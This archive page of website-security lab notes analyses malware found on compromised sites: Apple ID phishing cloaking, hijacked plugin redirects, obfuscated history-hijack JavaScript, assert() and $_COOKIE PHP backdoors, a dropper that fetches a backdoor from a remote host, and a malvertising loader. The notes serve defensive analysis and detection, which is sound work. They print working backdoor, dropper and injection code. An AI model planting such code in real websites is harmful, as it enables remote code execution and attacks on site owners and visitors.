Website Malware Infections Archives - Page 19 of 23

Phishing the Right Phish

Social engineering techniques, like phishing, can be powerful in persuading users into performing specific actions or disclosing confidential information. In these types of scenarios, attackers look for vulnerable sites on the web to upload fake pages pretending to be trustworthy organizations, such as banks, email and payment services, etc.

During an incident response process, we identified a phishing directory called “login-apple-account” on the website’s root. When accessing the path via HTTP, a very well structured fake version of the Apple ID website would be displayed:

Although at first it may seem just a regular phishing attempt, the page would be displayed only to a very specific set of visitors.

This conditional attack implemented several evasion techniques to prevent access from different IP ranges, and in some cases, redirecting search engines, antivirus and anti-phishing companies to the official Apple ID website through raw header() calls:

header("Location: hXXps://www[.]google[.]ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwi_yey8kvzJAhWwj4MKHVp5ALcQFggcMAA&url=hXXps%3A%2F%2Fappleid[.]apple[.]com%2F&usg=AFQjCNF7841Jq5PLrYJwYDN8RkcZjuNVww");

For instance, the “login-apple-account/assets/includes/netcraft_check.php” file prevents the malicious page to be accessed if the user-agent matches Netcraft, an anti-phishing company, redirecting it to a Google search result page:

<?phpif ($v_agent == "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)") {        header("Location: hXXps://www[.]google[.]ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=;uact=8&ved=0ahUKEwi_yey8kvzJAhWwj4MKHVp5ALcQFggcMAA&url=hXXps%3A%2F%2Fappleid[.]apple[.]com%2F&usg=AFQjCNF7841Jq5PLrYJwYDN8RkcZjuNVww");die();}?>

Other files refer to the “login-apple-account/assets/includes/blacklist.dat”, which has quite a big list of IP ranges from several services, to prevent them from accessing the phishing page:

#  NETCRAFT IP RANGES194.52.68.0-194.52.68.255194.72.238.0-194.72.238.25583.138.182.72-83.138.182.7983.138.189.96-83.138.189.10381.91.240.0-81.91.255.25589.36.24.0-89.36.31.25583.222.232.216-83.222.232.218184.172.0.0-184.173.255.255#  KASPERSKY IP RANGES...

There were also several other AntiVirus and AntiPhishing companies’ IPs listed in that file so the phishing page would go unnoticed during a regular website crawl, therefore preventing the phishing URL to get into blacklists.

Even though it tries to hide itself via HTTP, it cannot stop a server-side scan, so our server-side scanner is able to detect and alert you asap about such phishing pages. If you’re looking for a security solution that helps you avoid such issues, let us know.

Jul 4, 2017 by Fernando Barbosa

Yet Another Expired Domain causes WP Plugin to...

Malicious redirects are very common in compromised websites. Attackers try to take advantage of the site resources to promote spam, distribute other malware/backdoors, and perform all kinds of malicious activities.

The type of attack described in this labs note though, doesn’t involve a single website being compromised but lots of them being affected by it at the same time. Although this is not a new technique and we’ve already covered in a blog post here (https://blog.sucuri.net/2016/08/plugin-expired-domain-security-threat.html), this variant caught our attention because another plugin was being targeted.

During an Incident Response investigation, we found that malicious redirects were coming from a JavaScript loading via the website enmask.com, which is part of a WordPress plugin called “Enmask Captcha”. https://wordpress.org/plugins/enmask-captcha-text-based-hosted-captcha-solution/

“This plugin hasn’t been updated in over 2 years. It may no longer be maintained or supported and may have compatibility issues when used with more recent versions of WordPress.“

Their domain appears to have expired and somebody else purchased it and now anyone using this plugin would experience redirects on their website since the new owner of the domain is deliberately redirecting users.

Here are some more details about this plugin and what is causing the redirect:

Code found on the page:

&
lt;script type="text/javascript" data-enmask-langcode="en-US" src="hxxp://enmask[.]com//Scripts/Enmask.Captcha.js" data-enmask="true" data-enmask-name="myCaptcha"></script>

Clicking anything on the website leads to this page:

http://findbetterresults[.]com/?dn=enmask.com&pid=9PO755G95

The redirect is caused by the following JavaScript which gets returned when requesting any JavaScript file from the domain; it looks like the new owner of the domain is doing this intentionally:

if (typeof _popwnd == 'undefined') {
   var _popwnd = -1;
    function _popwnd_open(){
       if (_popwnd!=-1) return;
       _popwnd = window.open('hxxp://findbetterresults.com/?dn=enmask.com&pid=9PO755G95', '_blank', '');
       _popwnd.blur();
       window.focus();
    }
};
window.addEventListener('click', _popwnd_open);

If you happen to be using this plugin, we highly recommend removing and/or replacing it with another one which is still supported and could provide you similar functionalities.

Loading images and/or scripts from external websites is not recommended (exceptions may apply, like big CDNs or services like Facebook or Ad networks) for various reasons and here are some:

If your website looks and feels, or even its functionality relies on those external resources, any availability issues they have will impact on your website;
If the resource you fetch the content from is compromised, your site may be used to distribute unwanted content (even malicious content) without your consent (like we described in this labs note).

Jun 20, 2017 by Krasimir Konov

Undesired Redirects

Whether it is your own or a website you are visiting, undesired redirects and pop-ups are always annoying. The situation gets worse when your visitors start to get infected and your SEO ranking starts to drop.

During an Incident Response Investigation, we identified the following code in the header.php theme file:

< script type="text/javascript">document.write(unescape('%3c%73%63%72%69%70%74%20%74%79%70%65%3d%22%
74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%22%3e%20%0d%0a%21%66%75%6e%63%74%69%6f%6e%28%29%7b%76%61%72%20%74%3b
%74%72%79%7b%66%6f%72%28%74%3d%30%3b%31%30%3e%74%3b%2b%2b%74%29%68%69%73%74%6f%72%79%2e%70%75%73%68%53%74%61%74%65
%28%7b%7d%2c%22%22%2c%22%22%29%3b%6f%6e%70%6f%70%73%74%61%74%65%3d%66%75%6e%63%74%69%6f%6e%28%74%29%7b%74%2e%73%74
%61%74%65%26%26%6c%6f%63%61%74%69%6f%6e%2e%72%65%70%6c%61%63%65%28%22%68%74%74%70%73%3a%2f%2f%67%6f%6f%2e%67%6c%2f
%75%52%77%74%79%49%22%29%7d%7d%63%61%74%63%68%28%6f%29%7b%7d%7d%28%29%3b%0d%0a%3c%2f%73%63%72%69%70%74%3e'));</script >

If we decode it for easier viewing, this is the result:

document.write(unescape('<script type="text/javascript"> ! function() {
            var t;
            try {
                for (t = 0; 10 > t; ++t) history.pushState({}, "", "");
                onpopstate = function(t) {
                    t.state && location.replace("hxxps://goo.gl/uRwtyI")
                }
            } catch (o) {}
        }(); </script>'))

The malicious code above manipulates the browser history entries through the use of the pushState method() introduced in HTML5. In addition to that, the attackers emulated a “popstate” event that is dispatched to the browser window every time the active history entry changes. It basically means that if the visitor clicks on “Go back” in their browser (usually a left arrow beside your address bar), they would be redirected to that particular malicious goo.gl URL (hxxp://aliveforfun.com/random/).

These redirects range from leading visitors to rootkit distribution gateways (Exploit Kit), inadvertent ads and pop-ups, execution of unauthorized scripts, and much more. It’s devastating to both the website owner and their visitors and that’s why we recommend having a File Integrity Monitoring system in place to detect such injections in order to reduce its impact.

Jun 13, 2017 by Cesar Anjos

How Undefined Variables Can Give You RCE

When investigating a compromised website, our team has to make sure that all malware and backdoors are cleared from the environment. In some instances, these backdoors are easier to detect than others, but that's not always the case.

Attackers have been using different techniques to avoid detection with automated scanners, such as abusing of PHP tricks and abusing of spaces. In this article, we'll uncover another simple yet powerful method to execute commands remotely (RCE) while going undetected by regular scanners.

This obfuscation technique consists of adding undefined variables with string concatenation in order to allow RCE via the use of a PHP function called assert(). The code was injected into the WordPress file “./wp-includes/Requests/Exception/HTTP/511.php”. Here is the snippet:

error_reporting(0); $k="a"."".$sdfds."ss"."e".$jieos.""."rt"; $k/*;*/(/*;*/$/*;*/{"_".""."P".$esdwos."O"."S".$wmdir."T"} ['Derrtreuu54ew5']);

Please note that except for $k, all the other variables ($sdfds, $esdwos, ..) were not initialized. This would implicate in the following PHP Notice if it wasn’t for the error_reporting(0); declaration.

[Tue May 30 13:02:48.226182 2017] [:error] [pid 31554] [client 192.168.1.1:48152] PHP Stack trace:[Tue May 30 13:02:48.226185 2017] [:error] [pid 31554] [client 192.168.1.1:48152] PHP   1. {main}() /var/www/bd.php:0[Tue May 30 13:02:48.226241 2017] [:error] [pid 31554] [client 192.168.1.1:48152] PHP Notice:  Undefined variable: esdwos in /var/www/bd.php on line 5

After cleaning up the undefined variables and concatenating the strings (which were there only as a evasion technique), we can clearly see the backdoor:

assert($_POST['Derrtreuu54ew5']);

This snippet allows attackers to execute remote commands on the compromised website by sending a crafted $_POST request through the variable “Derrtreuu54ew5”.

As the malicious code was injected into the core WordPress structure (./wp-includes/…), a File Integrity Monitoring System would be able to quickly report these issues to the website owner and give them the chance in reducing damages to their online presence and SEO. Having regular backups of your files/database is also a great security measure to lessen the impacts of a compromise.

If you want to make sure your website is clean of backdoors that could be the entry point for infections and reinfections, let us know.

Jun 5, 2017 by Fernando Barbosa

The elegant dropper – reusable code for PHP...

During our malware research role, we analyze hundreds (if not thousands) of malware samples every day. Quite often, highly-obfuscated techniques are used by attackers to avoid detection and maintain access to the compromised environment for as long as possible.

One of these techniques is called dropper, which consists of using “good code” (undetectable by scanners), to download and execute another piece of malicious code from an external resource. In this article, we’ll describe how attackers used not only that but also implemented different evasion techniques along the way.

The code begins with a few assignments:

...$shpath = $_SERVER['DOCUMENT_ROOT']."/wp-admin/admin-menu.php";$shf = FFGet("hxxp://[INFECTED.DOMAIN]/wp-booter.txt");...file_put_contents($shpath, $shf);

The first variable ($shpath) receives the path where the backdoor will be placed and the second one ($shf) downloads and stores the content of the wp-booter.txt file from a remote server (controlled by the attacker). After that, the backdoor assigned to $shf is written into $shpath through file_put_contents().

Please note the function FFGet() which basically mimics the file_get_contents() and curl_init() as a fail-safe to download the backdoor. Here is a small snippet:

    if(strlen($file_contents)<1&&function_exists('curl_init')){       try       {            $file_contents ="";            $ch = curl_init();            $timeout = 30;            curl_setopt($ch,CURLOPT_URL,$url);            curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);            curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);            curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);            curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);            curl_setopt($ch,CURLOPT_USERAGENT,$user_agent);            $file_contents = curl_exec( $ch);            curl_close( $ch );

In addition to that, if the content of $file_contents is either unavailable or nonexistent, the dropper will elegantly display a standard “HTTP 503 Apache Error”.

if($file_contents=="503"||$file_contents==""){  ob_start();  header('HTTP/1.1 503 Service Temporarily Unavailable');  header('Status:  503 Service Temporarily Unavailable');  header('Retry-After:1200');  header('X-Powered-By:Apache');  exit();}

If everything works as planned for the attacker, the file $shpath ($_SERVER['DOCUMENT_ROOT']."/wp-admin/admin-menu.php"; will contain the backdoor located inside the file wp-booter.txt.

This technique (malware dropper) is often used because although the file wp-admin/admin-menu.php could be easily detected and removed, attackers would still be able to reinsert the backdoor by executing the dropper.

To detect these issues, we highly recommend having a File Integrity Monitoring System in place and clean backups of your files and database. If a compromise happens, you’d be more equipped to restore the website and prevent any damages to your online presence and SEO.

May 31, 2017 by Yuliyan Tsvetkov

Simple $_COOKIE backdoor (variation)

There are many ways to develop a backdoor and virtually all of them share a similar goal - not to be discovered. To achieve that, some attackers are giving up on using $_POST and $_GET variables, obfuscation techniques, etc, and playing with $_COOKIE’s to execute their code remotely.

The following code is a variation sample from a relatively recent malware wave (https://labs.sucuri.net/?note=2017/03/09 0:00 described by one of our researchers, Yuliyan):

<?php /*VdJR*/if(isset($_COOKIE["uFo"]))/*VO*/{$_COOKIE["JmR"]($_COOKIE["uFo"]);/*noRM*/exit;/*uDV*/}

As you can see, it works very similarly to other backdoors that use $_POST or $_GET variables instead of $_COOKIE. In this code, you simply need to set the “uFo” and “JmR” cookies, where the “JmR” one can be “eval” while “uFo” can be the code that you want to execute.

You can also notice the random comments between the statements as an attempt to avoid detection by simple static signatures used by some anti malware solutions (those comments may vary in their content and position in the code or may not even be present). This type of injection is not limited to a particular file or directory, as during our investigation, we detected several variants scattered throughout the file system.

If your website is getting reinfected very often, there might be a backdoor somewhere and we would love to clean it for you. If you need security experts to look after your website security, let us know.

May 30, 2017 by Fernando Barbosa

Tricky malvertising injections

When a website is compromised, one of the most interesting and challenging tasks we perform is identifying all malware to prevent attackers from regaining access to the resource. They may use different type of malicious codes and techniques depending on their final objectives.

In this particular case, during the remediation process the client mentioned that his users were seeing some type of malvertising, but he couldn't replicate the issue. We investigated it further and identified the following :

A malicious code was injected into the theme's file :

<?php $_00022b92=1;if(is_object($_SESSION["__default"]["user"]) && !($_SESSION["__default"]["user"]-&gt;id))    {echo " <script language=JavaScript id=onDate ></script> <script language=JavaScript src=/media/system/js/stat000.php ></script> ";};$_00022b92=1; ?>

- It included another file "stat000.php" :

/**/    <?php
    $dnoxemvhz=chr(97)."x73"."s"."e"."r"."t";    $bckttxtt="b".chr(97)."x73"."e".chr(54)."4"."x5f"."d"."e"."x63"."x6f".chr(100).chr(101);    @$dnoxemvhz(    @$bckttxtt(    'ZXZhbCb2tSMHhQ … long base64 string ...TTlKScpKTs='));    ##########################################################    ?>    /**/    //php_off

- When decoding the file I found that it made a request to:

$url_to="h"."t".chr(116)."x70"."x3a"."x2f"."/"."x70"."x69"."x63".chr(108).chr(105)."x73"."x74".chr(112)."x72"."o"."x74".chr(101).chr(99)."x74"."x2e"."x6e".chr(101)."x74"."/"."i"."x64"."4".chr(46)."x70"."h".chr(112);

Which decodes to “hxxp://piclistprotect.net/id4.php” ( taken offline )

The remote server then responded with this final payload :

function tzSignature() {       var tz;       try {           var currDate = new Date();           var currTime = currDate.toString();           tz = currDate.getTimezoneOffset();           if ( (currTime.indexOf("PDT") > 0) ||                (currTime.indexOf("MDT") > 0) ||                (currTime.indexOf("CDT") > 0) ||                (currTime.indexOf("EDT") > 0) ||                (currTime.indexOf("Daylight") > 0) )               tz += 60;           tz = - tz / 60;       } catch (e) {           tz = "";       }       return tz;    }    function rsSignature() {        var rs;        try {            var rsWidth = screen.width;            var rsHeight = screen.height;            var rs = rsWidth + "x" + rsHeight;        } catch (e) {            rs = "";        }        return rs;    }    var script = document.createElement("script");    script.src="hxxp://profixsysline.net//plix/scaner.php?id=4&tz="+tzSignature()+'&rs='+rsSignature();    document.head.appendChild(script);    //document.write('<sc'+'ript type="text/javascript" src="hxxp://profixsysline.net//plix/scaner.php?id=4&tz='+i+'&rs='+rsSignature()+'"></sc'+'ript>');

- As you can see, it uses two main functions : rsSignature() that returns the screen resolution and tzSignature() that returns the timezone which the page viewer is in. It passes those parameters to the "tz" and "rs" parameters like so : "hxxp://profixsysline.net//plix/scaner.php?id=4&tz=&rs="

Conclusion :

Attackers are constantly trying to be more efficient with their injections in order to only target certain victims. This malicious code serves specific ads to different timezones. We have been remediating lots of these types of injections lately. However, our http://sitecheck.sucuri.net/ scanner detects these types of injections and will warn you if there are any issues on your site.

May 10, 2017 by Abdelli Nassereddine